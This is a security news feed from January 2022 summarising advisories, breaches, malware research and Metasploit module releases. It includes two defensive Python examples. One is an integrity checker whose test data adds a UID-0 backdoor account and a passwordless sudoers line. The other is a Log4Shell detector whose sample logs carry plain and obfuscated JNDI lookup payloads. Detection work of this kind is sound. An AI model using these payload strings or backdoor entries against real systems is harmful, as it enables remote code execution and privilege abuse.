21 January 2022 05:34 CXSECURITY Database RSS Feed -
Topic: North Wing Limited - SQL Injection Vulnerability. Risk: Medium. Text: #Exploit Title: North Wing Limited - SQL Injection Vulnerability #...
21 January 2022 05:09 malware.news
Google has issued an update for the Chrome browser which includes 26 security fixes. What stands out is that one of these fixes is rated as “critical”. The critical vulnerability is a use-after-free bug in the Safe Browsing feature.
The Stable channel has been updated to 97.0.4692.99 for Windows, Mac and Linux, which will roll out over the coming days/weeks. The Extended Stable channel has also been updated to 96.0.4664.110 for Windows and Mac, which will roll out over the coming days/weeks.
The vulnerability
Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). The vulnerability in Safe Browsing that was rated critical has been assigned CVE-2022-0289. While Chrome vulnerabilities are rarely rated critical, this is already the second one this year. The previous one (CVE-2022-0096) was another use after free vulnerability that could lead t
21 January 2022 04:39 malware.news
Unless you’ve been living under a rock for the last month, you’ve definitely heard the technology community discussing the log4j vulnerability known as log4shell. If you have been living under a rock, feel free to catch up here. The danger of the vulnerability has been well covered, from the pervasiveness of the library in organizations worldwide to its ease of exploitation. It’s the type of bug whose full ramifications we may not understand for years.
There has been no shortage of hot takes on the issue, most of which surround the question ‘who is at fault?’. Is it the volunteer 16-person logging services team at the Apache Software Foundation? Is it the companies that make millions of dollars using open source code in their software but don’t make financial contributions to the maintenance of those open source components? What about the current lack of federal regulation surrounding the software supply chain?
The answer is probably some level of shared responsibility. Large corporations profiting off software 
21 January 2022 04:09 malware.news
The network guidance document is years in the making.
Article Link: https://www.nextgov.com/cybersecurity/2022/01/cisa-releases-finalized-ipv6-guidance-agencies/360973/
21 January 2022 04:09 malware.news
Most parents may find it difficult to relate to today’s form of cyberbullying. That’s because, for many of us, bullying might have come in a series of isolated, fleeting moments such as an overheard rumor, a nasty note passed in class, or a few brief hallway confrontations.
Fast forward a few decades, and the picture is spectacularly different, and a world few adults today would eagerly step into.
Cyberbullying includes targeting that is non-stop. It’s delivered digitally in an environment that is often anonymous. It’s a far-reaching, esteem-shattering, emotional assault. And the most traumatic component? The perpetual nature of the internet adds the ever-present threat of unlimited accessibility—kids know bullying can happen to anyone, at any time, and spread like wildfire.
The nature of cyberbullying can make a young victim feel hopeless and powerless. Skipping school doesn’t stop it. Summer vacation doesn’t diminish it. That’s because the internet is ever-present.
According to a 2020 Ditch the Label C
21 January 2022 03:39 malware.news
Newsletter compiled by Jon Munshaw. Good afternoon, Talos readers.
Even though we’re nearly a month into 2022, we’re still not quite ready to move on from 2021. That’s why next week, we’ll be going live on social media to talk about some of the top cybersecurity stories from the past…
Article Link: Cisco Talos Intelligence Group - Comprehensive Threat Intelligence: Threat Source Newsletter (Jan. 20, 2022)
21 January 2022 03:39 malware.news
A new report reveals what kind of medical devices are at most risk of security threats.
Article Link: More than half of medical devices found to have critical vulnerabilities | ZDNet
21 January 2022 03:35 Black Hills Information Security
Originally aired on January 4, 2022. Articles discussed in this episode:
00:00 – PreShow Banter™ — Who’s Job Is It Anyway?
00:20 – BHIS – Talkin’ Bout [infosec] News 2022-01-04
01:58 – Story #1: iLOBleed Rootkit – https://thehackernews.com/2021/12/new-ilobleed-rootkit-targeting-hp.html
08:39 – Story #2: Firmware attack can drop persistent malware in hidden SSD area – https://www.bleepingcomputer.com/news/security/firmware-attack-can-drop-persistent-malware-in-hidden-ssd-area/
[…]
The post Talkin’ About Infosec News – 1/7/2022 appeared first on Black Hills Information Security.
21 January 2022 03:35 Black Hills Information Security
Originally aired on January 10, 2022. Articles discussed in this episode:
01:58 – Story #1: WordPress Core Vulnerabilities – https://www.searchenginejournal.com/wordpress-core-vulnerabilities/432042/#close
11:32 – Story #2: Card-stealing code on over 100 Sotheby’s luxury real estate sites – https://therecord.media/card-stealing-code-found-on-more-than-100-sothebys-luxury-real-estate-sites/
14:55 – Story #3: France hits Facebook & Google with $210 million in fines – https://www.bleepingcomputer.com/news/legal/france-hits-facebook-and-google-with-210-million-in-fines/
[…]
The post Talkin’ About Infosec News – 1/14/2022 appeared first on Black Hills Information Security.
21 January 2022 03:35 Files ≈ Packet Storm
The Babuk ransomware builder suffers from an insecure permissions vulnerability.
21 January 2022 03:35 Files ≈ Packet Storm
Red Hat Security Advisory 2022-0187-04 - The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements. Issues addressed include heap overflow and privilege escalation vulnerabilities.
21 January 2022 03:35 Files ≈ Packet Storm
Red Hat Security Advisory 2022-0186-07 - The kernel packages contain the Linux kernel, the core of any Linux operating system. Issues addressed include heap overflow and privilege escalation vulnerabilities.
21 January 2022 03:35 Files ≈ Packet Storm
Red Hat Security Advisory 2022-0114-04 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the RPM packages for Red Hat OpenShift Container Platform 4.7.41.
21 January 2022 03:35 Files ≈ Packet Storm
Red Hat Security Advisory 2022-0188-07 - The kernel packages contain the Linux kernel, the core of any Linux operating system. Issues addressed include a heap overflow vulnerability.
21 January 2022 03:34 Files ≈ Packet Storm
Red Hat Security Advisory 2022-0190-04 - Red Hat Satellite is a system management solution that allows organizations to configure and maintain their systems without the necessity to provide public Internet access to their servers or other client systems. It performs provisioning and configuration management of predefined standard operating environments. Issues addressed include an information leakage vulnerability.
21 January 2022 03:34 Files ≈ Packet Storm
Ubuntu Security Notice 5240-1 - William Liu and Jamie Hill-Daniel discovered that the file system context functionality in the Linux kernel contained an integer underflow vulnerability, leading to an out-of-bounds write. A local attacker could use this to cause a denial of service or execute arbitrary code.
21 January 2022 03:34 Files ≈ Packet Storm
Ubuntu Security Notice 5241-1 - It was discovered that QtSvg incorrectly handled certain malformed SVG images. If a user or automated system were tricked into opening a specially crafted image file, a remote attacker could use this issue to cause QtSvg to crash, resulting in a denial of service, or possibly execute arbitrary code.
21 January 2022 03:34 Files ≈ Packet Storm
Red Hat Security Advisory 2022-0199-02 - Libreswan is an implementation of IPsec and IKE for Linux. IPsec (Internet Protocol Security) uses strong cryptography to provide both authentication and encryption services. These services allow you to build secure tunnels, such as a virtual private network, through untrusted networks.
21 January 2022 03:34 Files ≈ Packet Storm
Red Hat Security Advisory 2022-0191-03 - OpenShift Virtualization is Red Hat's virtualization solution designed for Red Hat OpenShift Container Platform. This advisory contains OpenShift Virtualization 4.9.2 images.
21 January 2022 03:34 Files ≈ Packet Storm
Red Hat Security Advisory 2022-0202-04 - The Migration Toolkit for Containers enables you to migrate Kubernetes resources, persistent volume data, and internal container images between OpenShift Container Platform clusters, using the MTC web console or the Kubernetes API.
21 January 2022 03:34 Files ≈ Packet Storm
Red Hat Security Advisory 2022-0203-03 - The releases of Red Hat Fuse 7.8.2, 7.9.1 and 7.10.1 serve as a patch to Red Hat Fuse on Karaf and Red Hat Fuse on Spring Boot and include security fixes, which are documented in the Release Notes document linked to in the References. Issues addressed include code execution and denial of service vulnerabilities.
21 January 2022 03:34 Files ≈ Packet Storm
Ubuntu Security Notice 5021-2 - USN-5021-1 fixed vulnerabilities in curl. This update provides the corresponding updates for Ubuntu 16.04 ESM. Harry Sintonen and Tomas Hoger discovered that curl incorrectly handled TELNET connections when the -t option was used on the command line. Uninitialized data possibly containing sensitive information could be sent to the remote server, contrary to expectations.
21 January 2022 03:34 Files ≈ Packet Storm
Ubuntu Security Notice 5242-1 - It was discovered that Open vSwitch incorrectly handled certain fragmented packets. A remote attacker could possibly use this issue to cause Open vSwitch to consume resources, leading to a denial of service.
21 January 2022 03:34 Security Boulevard
When it comes to navigating the challenges presented by today’s cybersecurity landscape, most businesses need additional support. That’s where a managed security services provider (MSSP) can prove invaluable. MSSPs have their pulse on current and future cybersecurity needs, and can help clients navigate an ever-changing set of threats. But with hundreds of MSSPs out there,…
The post What to Look for in an MSSP – Our Top 10 Tips, Plus Free Downloadable Checklist appeared first on Nuspire.
The post What to Look for in an MSSP – Our Top 10 Tips, Plus Free Downloadable Checklist appeared first on Security Boulevard.
21 January 2022 03:34 Files ≈ Packet Storm
Ubuntu Security Notice 5243-1 - David Bouman discovered that AIDE incorrectly handled base64 operations. A local attacker could use this issue to cause AIDE to crash, resulting in a denial of service, or possibly execute arbitrary code.
21 January 2022 03:34 Security Boulevard
Our thanks to Security BSides London for publishing their tremendous videos from the Security BSides London 2021 Conference on the organization’s YouTube channel. Enjoy!
The post Security BSides London 2021 – Gabriel Currie’s ‘Ready For (Nearly) Anything: Preparing Your Organisation For A Cyber Incident’ appeared first on Security Boulevard.
21 January 2022 03:34 Security Boulevard
When defense contractors look for a reliable source to store and share their controlled unclassified information (CUI), they will frequently turn to a cloud service provider (CSP). Cloud is a superior choice for contractors over storing on premise as cloud enables unlimited storage, access to data from anywhere, data resiliency, and freedom from managing and […]
The post Buyers Guide to Compliant Cloud Services for Defense Contractors appeared first on PreVeil.
The post Buyers Guide to Compliant Cloud Services for Defense Contractors appeared first on Security Boulevard.
21 January 2022 03:34 Files ≈ Packet Storm
Red Hat Security Advisory 2022-0216-06 - Red Hat JBoss Enterprise Application Platform 7 is a platform for Java applications based on the WildFly application runtime. This asynchronous patch is a security update for Red Hat JBoss Enterprise Application Platform 7.4. Issues addressed include code execution and denial of service vulnerabilities.
21 January 2022 03:34 Security Boulevard
It’s no secret that APIs are under attack. Companies are struggling to keep their APIs safe and secure from accidental breaches to malicious hacks. The problem will only worsen as.
The post Critical OWASP Top 10 API Security Threats appeared first on Indusface.
The post Critical OWASP Top 10 API Security Threats appeared first on Security Boulevard.
21 January 2022 03:34 Files ≈ Packet Storm
Red Hat Security Advisory 2022-0083-03 - This release of Red Hat build of Eclipse Vert.x 4.1.8 GA includes security updates. For more information, see the release notes listed in the References section. Issues addressed include code execution and denial of service vulnerabilities.
21 January 2022 03:34 Security Boulevard
The Federal Communications Commission (FCC) has proposed stricter requirements for companies to disclose data breaches. According to the proposal, companies would be required to notify customers affected by inadvertent breaches, and the one-week waiting period before disclosure would be eliminated. The updates would better align the FCC’s rules with recent developments in federal and state..
The post FCC Proposes Stricter Regulations for Data Breach Disclosure appeared first on Security Boulevard.
21 January 2022 03:34 Files ≈ Packet Storm
William Liu and Jamie Hill-Daniel discovered that the file system context functionality in the Linux kernel contained an integer underflow vulnerability, leading to an out-of-bounds write. A local attacker could use this to cause a denial of service (system crash) or execute arbitrary code.
21 January 2022 03:34 Files ≈ Packet Storm
AIDE (Advanced Intrusion Detection Environment) is a free replacement for Tripwire(tm). It generates a database that can be used to check the integrity of files on a server. It uses regular expressions to determine which files get added to the database. You can use several message digest algorithms to ensure that the files have not been tampered with.
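The mechanism described above (a baseline of digests over a regex-selected set of files, later re-computed and diffed) is small enough to show end to end. The following is an added example, not AIDE's own code: it builds a baseline with two digest algorithms over a constructed temporary tree, tampers with that tree, and reports what changed. The directory layout, file contents and the `^etc/` include pattern are all constructed for the demonstration.

```python
import hashlib
import os
import re
import tempfile


def file_digest(path: str, algo: str = "sha256") -> str:
    """Hex digest of one file, read in chunks so large files are not loaded whole."""
    h = hashlib.new(algo)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root: str, include: str, algos=("sha256", "sha512")) -> dict:
    """Walk `root`; for every regular file whose path relative to root matches the
    `include` regex, record one digest per algorithm (two digests make a collision
    against both far harder than against one). Returns {relative_path: {algo: hex}}."""
    pattern = re.compile(include)
    baseline = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            if os.path.islink(full) or not os.path.isfile(full) or not pattern.search(rel):
                continue
            baseline[rel] = {a: file_digest(full, a) for a in algos}
    return baseline


def compare(old: dict, new: dict) -> dict:
    """Classify paths as added, removed or changed between two baselines."""
    added = sorted(set(new) - set(old))
    removed = sorted(set(old) - set(new))
    changed = sorted(p for p in set(old) & set(new) if old[p] != new[p])
    return {"added": added, "removed": removed, "changed": changed}


def demo() -> dict:
    """Constructed scenario: baseline a small tree, tamper with it, re-check."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "etc"))
        os.makedirs(os.path.join(root, "var", "log"))
        with open(os.path.join(root, "etc", "passwd"), "w") as f:
            f.write("root:x:0:0:root:/root:/bin/bash\n")
        with open(os.path.join(root, "etc", "hosts"), "w") as f:
            f.write("127.0.0.1 localhost\n")
        with open(os.path.join(root, "var", "log", "syslog"), "w") as f:
            f.write("noise\n")
        # Only etc/ is monitored: log files churn constantly and would be pure noise.
        before = build_baseline(root, r"^etc/")
        # Tamper: add a second UID-0 account, drop a new file, grow the (unmonitored) log.
        with open(os.path.join(root, "etc", "passwd"), "a") as f:
            f.write("backdoor:x:0:0::/root:/bin/bash\n")
        with open(os.path.join(root, "etc", "sudoers.d"), "w") as f:
            f.write("backdoor ALL=(ALL) NOPASSWD: ALL\n")
        with open(os.path.join(root, "var", "log", "syslog"), "a") as f:
            f.write("more noise\n")
        after = build_baseline(root, r"^etc/")
        return compare(before, after)


if __name__ == "__main__":
    print(demo())
```

The check is only as trustworthy as the stored baseline: an attacker with root on the same host can rewrite it along with the files, so keep the database on read-only or offline media and record its own digest elsewhere.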
21 January 2022 03:34 Files ≈ Packet Storm
Botan is a C++ library of cryptographic algorithms, including AES, DES, SHA-1, RSA, DSA, Diffie-Hellman, and many others. It also supports X.509 certificates and CRLs, and PKCS #10 certificate requests, and has a high level filter/pipe message processing system. The library is easily portable to most systems and compilers, and includes a substantial tutorial and API reference. This is the current stable release.
21 January 2022 03:34 Files ≈ Packet Storm
Graudit is a simple script and set of signatures that allows you to find potential security flaws in source code using the GNU utility grep. It's comparable to other static analysis applications like RATS, SWAAT, and flawfinder while keeping the technical requirements to a minimum and being very flexible.
21 January 2022 03:34 Files ≈ Packet Storm
VMware vCenter Server is affected by the Log4Shell vulnerability: a JNDI lookup string can be sent to the server, which causes it to connect back to the attacker and deserialize a malicious Java object. This results in OS command execution as the root user on the Linux virtual appliance and as SYSTEM on Windows. This Metasploit module starts an LDAP server that the target must be able to connect to. This exploit uses the logon-page vector.
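The logon-page vector works because the server logs attacker-controlled request data and Log4j resolves `${jndi:...}` lookups inside what it logs. A detection that only greps for the literal string `${jndi:` misses the nested-lookup obfuscations seen in the wild. The following is an added example, not code from the page or from the Metasploit module it describes: a small detector that collapses the common innermost lookups (`${lower:j}`, `${upper:n}`, `${::-l}`, `${env:UNSET:-d}`) to a fixed point before searching for the `jndi:` lookup, run over constructed Apache-style access-log lines (documentation-range IPs, hypothetical paths).

```python
import re

# Constructed sample access-log lines (not from the original page). Lines 1 and 2 carry a
# JNDI lookup in the User-Agent field; line 2 hides it behind nested lookups; line 3 is benign.
SAMPLE_LOG = [
    '203.0.113.10 - - [21/Jan/2022:03:34:00 +0000] "GET /ui/login HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://203.0.113.10:1389/a}"',
    '198.51.100.7 - - [21/Jan/2022:03:34:01 +0000] "GET /ui/login HTTP/1.1" 200 512 "-" '
    '"${${lower:j}${upper:n}di:${::-l}${env:UNSET:-d}ap://198.51.100.7:1389/x}"',
    '192.0.2.5 - - [21/Jan/2022:03:34:02 +0000] "GET /ui/login HTTP/1.1" 200 512 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64)"',
]

# Innermost lookups (no "$", "{" or "}" inside) that attackers use to assemble "jndi".
_LOWER = re.compile(r"\$\{lower:([^${}]*)\}", re.IGNORECASE)
_UPPER = re.compile(r"\$\{upper:([^${}]*)\}", re.IGNORECASE)
_DEFAULT = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")      # ${::-j} and ${env:UNSET:-j}
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)://", re.IGNORECASE)


def normalize(text: str) -> str:
    """Collapse innermost obfuscating lookups repeatedly until the string stops changing,
    which handles arbitrarily deep nesting the same way Log4j's own resolver would."""
    prev = None
    while prev != text:
        prev = text
        text = _LOWER.sub(lambda m: m.group(1).lower(), text)
        text = _UPPER.sub(lambda m: m.group(1).upper(), text)
        text = _DEFAULT.sub(lambda m: m.group(1), text)
    return text


def scan_log(lines):
    """Return (line_number, scheme, normalized_lookup) for every line carrying a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, 1):
        norm = normalize(line)
        m = _JNDI.search(norm)
        if m is None:
            continue
        end = norm.find("}", m.end())
        lookup = norm[m.start():end + 1] if end != -1 else norm[m.start():]
        hits.append((number, m.group(1).lower(), lookup))
    return hits


if __name__ == "__main__":
    for number, scheme, lookup in scan_log(SAMPLE_LOG):
        print(f"line {number}: {scheme} lookup {lookup}")
```

Run this over whatever the application actually logs, not just the access log: the vulnerable sink is any logged string, so headers such as User-Agent and X-Forwarded-For and decoded request bodies all need the same normalisation before matching. Scheme is extracted because the outbound `ldap`, `rmi` or `dns` connection from the server is the second, network-side indicator to correlate with.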
21 January 2022 03:34 Files ≈ Packet Storm
This Metasploit module exploits a command injection vulnerability in Grandstream GXV3175 IP multimedia phones. The settimezone action does not validate input in the timezone parameter, allowing injection of arbitrary commands. A buffer overflow in the phonecookie cookie parsing allows authentication to be bypassed by providing an alphanumeric cookie 93 characters in length. This module was tested successfully on Grandstream GXV3175v2 hardware revision V2.6A with firmware version 1.0.1.19.
21 January 2022 03:34 Files ≈ Packet Storm
The openscap project is a set of open source libraries that support the SCAP (Security Content Automation Protocol) set of standards from NIST. It supports CPE, CCE, CVE, CVSS, OVAL, and XCCDF.
21 January 2022 03:34 Files ≈ Packet Storm
Red Hat Security Advisory 2022-0205-02 - Red Hat Data Grid is an in-memory, distributed, NoSQL datastore solution. It improves application response times and allows for dramatically improving performance while providing availability, reliability, and elastic scale. Data Grid 8.2.3 replaces Data Grid 8.2.2 and includes bug fixes and enhancements. Issues addressed include code execution and denial of service vulnerabilities.
21 January 2022 03:09 malware.news
I use PowerPoint in my law practice more often than Microsoft Word. Word processing tools are for preparing documents for …
Article Link: Six Powerful Points for Better Presentations | Ball in your Court
21 January 2022 03:09 malware.news
Online activity is starting to trickle out of the island nation of Tonga after a massive volcanic eruption and tsunami Saturday left the area offline while responding to the disaster, according to global networks watchers.
UPDATE ON TONGA: First signs of life for Internet connectivity out of #Tonga since the volcanic eruption!

TCC (Tonga Communications Company, AS38201) started coming back via satellite (Speedcast, AS5666) earlier today.https://t.co/8RljNqIqwC pic.twitter.com/vmNYMtHAZ9
— Doug Madory (@DougMadory) January 20, 2022
Doug Madory, Director of Internet Analysis for Kentik, says the company observed “first signs of life for Internet connectivity in Tonga since the recent volcanic eruption” at 22:37 UTC on 19 January 2022.
“Incumbent provider TCC (Tonga Communications Company) has reappeared in the global routing table via a connection to Speedcast, a Pacific region satellite operator,” Madory told The Record.

Speedcast confirmed to The Record that it was helping “restore vital connectivity servi
21 January 2022 02:09 malware.news
Now that we’re almost through the first month of 2022, it’s a good opportunity for us to take a look back at 2021 and the accomplishments of the Zero Day Initiative throughout the year. The past year was certainly a year full of its challenges, but we also celebrated some unique achievements in our busiest year ever. In addition to publishing the highest number of advisories in the history of the program, we hit our first million-dollar Pwn2Own in April. And as if that weren’t enough, we did it again in the fall as Pwn2Own Austin also exceeded the $1,000,000 threshold.
To say these were superlative events is an understatement. In the spring edition, we saw multiple Exchange exploits demonstrated, including ProxyShell. We saw 0-click remote code execution demonstrated on Zoom messenger and a 1-click code execution on Microsoft Teams. That’s on top of the Chrome, Edge, and Safari web browsers all getting compromised, too. The fall event had its own highlights, with the Samsung Galaxy, multiple routers, NAS devi
21 January 2022 02:09 malware.news
At some point a buzzword becomes meaningless; it moves so far beyond the original intention that it’s just background noise. We passed that moment a long time ago with the term “DevOps” and even quicker with “DevSecOps.” That’s unfortunate because both of these terms put a name to a long standing problem within teams building [...]
Read More... from What the Cloud? DevOps and DevSecOps Explained
The post What the Cloud? DevOps and DevSecOps Explained appeared first on Lacework.
Article Link: What the Cloud? DevOps and DevSecOps Explained - Lacework
21 January 2022 01:39 malware.news
The Treasury Department on Thursday imposed sanctions on four current and former Ukrainian government officials for engaging in “Russian government-directed influence activities” in Ukraine, including gathering information about the country’s critical infrastructure.
The U.S. alleges that the four individuals — two Ukrainian members of parliament and two former officials — were recruited by Russia’s Federal Security Service (FSB) in an effort to place “citizens in key positions to gain access to sensitive information, threaten the sovereignty of Ukraine, and then leverage these Ukrainian officials to create instability in advance of a potential Russian invasion,” the Treasury Department said in a statement.
Moscow has directed its intelligence services to seek out such officials in order to “prepare to take over the government of Ukraine and to control Ukraine’s critical infrastructure with an occupying Russian force,” according to the department.
Among the individuals sanctioned is former Ukrainian governmen
21 January 2022 01:39 malware.news
The security community is continuously changing, growing, and learning from each other to better position the world against cyber threats. In the latest post of our Voice of the Community blog series, Microsoft Security Product Marketing Manager Natalia Godyla talks with Heath Adams, Chief Executive Officer (CEO) at TCM Security about being a mentor, hiring new security talent, certifications, upskilling, the future of cybersecurity training, and lots more.
Natalia: What do you recommend to security leaders concerned with the talent shortfall?
Heath: There needs to be more openness and getting away from gatekeeping. In this industry, there’s a lot of, “I went through this path, so you need to go through this path.” Or “I did these certifications, so you need to do these certifications.” Everybody wants this perfect candidate—somebody who has 10 years of experience—even when they don’t necessarily need it. We need to be able to take somebody that’s more junior, who we can help train. Or take someone with a cle
21 January 2022 01:34 Security Boulevard
Last summer, the San Francisco police illegally used surveillance cameras at the George Floyd protests. The EFF is suing the police:
This surveillance invaded the privacy of protesters, targeted people of color, and chills and deters participation and organizing for future protests. The SFPD also violated San Francisco’s new Surveillance Technology Ordinance. It prohibits city agencies like the SFPD from acquiring, borrowing, or using surveillance technology, without prior approval from the city’s Board of Supervisors, following an open process that includes public participation. Here, the SFPD went through no such process before spying on protesters with this network of surveillance cameras...
The post San Francisco Police Illegally Spying on Protesters appeared first on Security Boulevard.
21 January 2022 01:34 Security Boulevard
Google pushed out a new Chrome version 97.0.4692.99 with much fanfare about a number of serious security fixes it brings. A total of 22 vulnerabilities addressed with the latest Chrome refresh were reported by external researchers, including one critical-severity [CVE-2022-0289, a critical use-after-free flaw in Safe Browsing that can achieve arbitrary code execution], 16 high-severity, … Continue reading Mixed Messages of Google Chrome 97: Worse Privacy, Better Security →
The post Mixed Messages of Google Chrome 97: Worse Privacy, Better Security appeared first on Security Boulevard.
21 January 2022 01:34 Security Boulevard
Security and IT teams need to tackle this problem in a structured process that takes into account API application security best practices and procedures that constantly evaluate an organization's APIs.
The post Observability, AI And Context: Protecting APIs From Today’s (And Tomorrow’s) Attacks appeared first on Traceable App & API Security.
The post Observability, AI And Context: Protecting APIs From Today’s (And Tomorrow’s) Attacks appeared first on Security Boulevard.
21 January 2022 01:34 Security Boulevard
It's time to start treating your IT department differently. It is a resource, an employee retention tool, a critical cog in your ability to sustain operability.
The post Rebuttal: It’s Time to Get Rid of the IT Department appeared first on JumpCloud.
The post Rebuttal: It’s Time to Get Rid of the IT Department appeared first on Security Boulevard.
21 January 2022 01:34 Microsoft Security Blog
Heath Adams, Chief Executive Officer at TCM Security, offers practical advice on how to build a security team.
The post Build a stronger cybersecurity team through diversity and training appeared first on Microsoft Security Blog.
21 January 2022 01:10 malware.news
CEO Kris Marszalek said all impacted users were fully reimbursed on the same day.
Article Link: Fortune favours the breached: Crypto.com admits 400 users hit in hack | ZDNet
2022年1月21日 01:10malware.news
Enhancements:
A new version of 365 Total Protection has been introduced, including 365 Total Backup. Thus, the initial setup has been simplified.
In the log entries in the “Auditing 2.0” module, the values that have been changed by an event are now highlighted by shading.
In the “Email Live Tracking” module, new icons for the direction of emails have been introduced.
In the scope selection, a new icon for partners has been introduced.
Improvements:
Several improvements have been made to Hornet.email Webmail, the web client of our Hornet.email service.
In the “Email Live Tracking” module, an error in displaying archived emails has been fixed.
In the “Mailbox Reassignment” tab of the “Mailboxes” module, a warning message has been improved.
When uploading a logo in the “Email template” tab of the “Customization” module, the MIME type of the file is now also checked. Only .png logos are accepted.
In the “Email Authentication” module, an error while clicking on the advanced options has been fixed.
In the “Email Aut
January 21, 2022 01:10 malware.news
The Singapore Police Force has issued an advisory cautioning the public about advertisements on Google's search platform that contain fake bank hotlines, adding that these scams have already resulted in losses of more than S$495,000 ($367,775).
Article Link: Singapore police warns of ad scams targeting Google search users | ZDNet
January 21, 2022 01:10 malware.news
These days WordPress infections are very common. In 2021, internetlivestats.com counted over 81 million websites hacked. If you’re one of the millions, you need to take action to fix and protect your site. Of course, a hacked site will put any site owner into panic mode. This article will provide insight on what to do if your website is hacked and how to move forward. WordPress sites can be hacked due to a variety of reasons, which we cover in Why are WordPress sites targeted by hackers?
Continue reading What Should You do if Your WordPress Site was Hacked? at Sucuri Blog.
The post What Should You do if Your WordPress Site was Hacked? appeared first on Security Boulevard.
Article Link: What Should You do if Your WordPress Site was Hacked? - Security Boulevard
January 21, 2022 01:10 malware.news
Victims were conned out of thousands of pounds, including one woman who was terminally ill.
Article Link: 'Serial' romance fraudster jailed for trying to scam 670 people in the UK | ZDNet
January 21, 2022 01:10 malware.news
Here is a piece of malicious Python script that injects a RedLine[1] stealer into its own process. Process injection is a common attacker technique these days (and has been for a long time already). The difference, in this case, is that the payload is delivered through FTP! It's pretty unusual because FTP is used less and less today for multiple reasons (lack of encryption by default, complex to filter with its passive/active modes). Support for FTP has even been disabled by default in Chrome starting with version 95! But FTP remains a common protocol in the IoT/Linux landscape with malware families like Mirai. My honeypots still collect a lot of Mirai samples on FTP servers. I don't understand why the attacker chose this protocol because, in most corporate environments, FTP is not allowed by default (and should definitely not be!).
Article Link: RedLine Stealer Delivered Through FTP
January 21, 2022 01:10 malware.news
What happened?
At the end of 2021, we were made aware of a UEFI firmware-level compromise through logs from our Firmware Scanner, which has been integrated into Kaspersky products since the beginning of 2019. Further analysis has shown that a single component within the inspected firmware’s image was modified by attackers in a way that allowed them to intercept the original execution flow of the machine’s boot sequence and introduce a sophisticated infection chain.
By examining the components of the rogue firmware and other malicious artefacts from the target’s network, we were able to reach the following conclusions:
The inspected UEFI firmware was tampered with to embed a malicious code that we dub MoonBounce;
Due to its emplacement on SPI flash which is located on the motherboard instead of the hard disk, the implant is capable of persisting in the system across disk formatting or replacement;
The purpose of the implant is to facilitate the deployment of user-mode malware that stages execution of further p
January 21, 2022 01:10 malware.news
Multichain messaging seems confusing, at best.
Article Link: Multichain token hack losses reach $3 million: report | ZDNet
January 21, 2022 01:10 malware.news
This blog was written by an independent guest blogger.
Non-fungible tokens (NFTs) are the new player in the financial investment market. They've seen tremendous interest from a wide range of parties, whether institutional investors or retail hobbyists looking to find an angle. As with anything involving money, malicious actors are already starting to take hold; Insider magazine recently highlighted the theft of 265 Ethereum (roughly $1.1 million) through a fraudulent NFT scheme.
Just as cybersecurity has needed frequent and substantial improvements to shore up the security scene, so have NFTs, and those who purchase them. Funnily enough, the key to protecting NFTs is first understanding their financial liability and the laws governing them.
Governmental regulations
Cryptocurrency has been subjected to a rapidly changing balance of laws for the government to try and control it through regulation. NFTs are much the same; while they have entered the market as a form of ultra-modern art exchange, they are sti
January 21, 2022 01:10 malware.news
Summary
In this installment of our monthly email threat review, we present an overview of the email-based threats observed in December 2021 and compare them to the previous month’s threats.
The report provides insights into:
Unwanted emails by category
File types used in attacks
Industry Email Threat Index
Attack techniques
Impersonated company brands and organizations
Unwanted emails by category
The following table shows the distribution of unwanted emails per category.
Email category    %
Rejected          80.70
Spam              14.27
Threat             4.15
AdvThreat          0.84
Content            0.04
The following time histogram shows the email volume per category per day.
Readers of our previous reports likely already guessed that the spike in rejected emails at the start of December can be attributed to a large-scale monthly re-occurring sextortion scam spam campaign targeting German-speaking victims.
Methodology
The listed email categories correspond to the email categories listed in the Email Live Tracking of Hornetsecuri